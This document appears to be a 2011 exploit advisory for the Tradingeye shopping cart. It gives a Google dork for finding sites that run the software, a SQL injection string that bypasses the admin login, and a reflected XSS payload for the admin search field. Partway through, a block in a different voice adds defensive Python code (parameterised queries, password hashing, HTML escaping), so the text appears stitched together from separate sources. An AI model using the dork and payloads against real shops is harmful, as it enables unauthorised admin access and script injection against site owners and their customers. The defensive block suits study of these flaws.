# Exploit Title: Tradingeye Multiple Vulnerabilities
# Vendor: www.tradingeye.com
# Date: 12th July, 2011
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D (http://www.shadowrootkit.wordpress.com)
# Google Dork: Powered by Tradingeye. 2009 Tradingeye v6 demo
*****************************
BRIEF DESCRIPTION
*****************************
Tradingeye is a fully-featured web standards compliant Shopping Cart & CMS,
built from the ground up with web accessibility and SEO in mind. Tradingeye
is the choice of thousands of online retailers who care about accessibility,
usability and most importantly - results.
*****************************
(Auth ByPass) SQLi Vulnerability
*****************************
{DEMO}: http://site.com/adminindex.php
EXPLOIT:
Username: ' or0=0#
Password: ' or0=0#
Observe: submitting these values as the username and password bypasses the
login check entirely, so an attacker is logged into the site's admin panel
without valid credentials.
Reflected XSS Vulnerability
********************************
EXPLOIT 2: Reflected XSS Vulnerability in admin panel (search field)
{Demo}: http://site.com/user/adminindex.php?action=user.home
Exploit: ">><marquee><h1>XSSed_by_r007k17</h1></marquee>
*****************************
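The defensive counterpart to both findings above, as an added example that is not Tradingeye's code: a login check that binds the username as a query parameter and verifies the password in code (so the advisory's `' or0=0#` string can only ever be matched as literal data), plus a search-result renderer that HTML-encodes the reflected term. The table layout, the `admin` account and its `demo-admin-pass` password are constructed for the demonstration; `unsafe_login_query` only builds, and never executes, the concatenated query that makes the bypass possible.

```python
"""Hardened login and output encoding (added illustration, not the product's code).

The user table, the sample account and its password are constructed here.
"""
import hashlib
import hmac
import html
import os
import sqlite3

PBKDF2_ROUNDS = 200_000


def hash_password(password: str, salt: bytes) -> bytes:
    """Derive a PBKDF2-HMAC-SHA256 hash; plaintext passwords are never stored."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)


def build_db() -> sqlite3.Connection:
    """In-memory user table holding one constructed admin account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    conn.execute(
        "INSERT INTO users VALUES (?, ?, ?)",
        ("admin", salt, hash_password("demo-admin-pass", salt)),  # constructed credentials
    )
    return conn


def unsafe_login_query(username: str, password: str) -> str:
    """Build (without executing) the query a concatenating login would run.

    A single quote in the input closes the string literal, so the remainder is
    parsed as SQL: `or0=0` is always true and `#` opens a MySQL comment that
    discards the password clause. This is the mechanism behind the advisory's
    authentication bypass.
    """
    return ("SELECT username FROM users WHERE username='" + username
            + "' AND password='" + password + "'")


def login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened check: the username is bound as a parameter, so it is compared
    as data and never parsed as SQL; the password is verified in code with a
    constant-time comparison instead of inside the WHERE clause."""
    row = conn.execute(
        "SELECT salt, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    salt, stored = row
    return hmac.compare_digest(stored, hash_password(password, salt))


def render_search_results(term: str) -> str:
    """Encode the reflected search term before writing it into the HTML body.

    quote=True also encodes " and ', so the same function is safe when the
    term is echoed back inside an attribute value such as value="...".
    """
    return "<p>Results for: " + html.escape(term, quote=True) + "</p>"


if __name__ == "__main__":
    db = build_db()
    payload = "' or0=0#"  # the bypass string from the advisory above
    print(unsafe_login_query(payload, payload))
    print("bypass against parameterised login:", login(db, payload, payload))
    print("real credentials:", login(db, "admin", "demo-admin-pass"))
    print(render_search_results('">><marquee><h1>XSSed_by_r007k17</h1></marquee>'))
```

Fetching the row by username only and checking the hash afterwards keeps the password out of the SQL entirely; encoding at the point where the value is written into HTML, rather than filtering on input, is what stops the reflected search term from being interpreted as markup.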
gr33t1ngs to s1d3 effects and my friends@!21/\/ _3lda@!3.14--
*****************************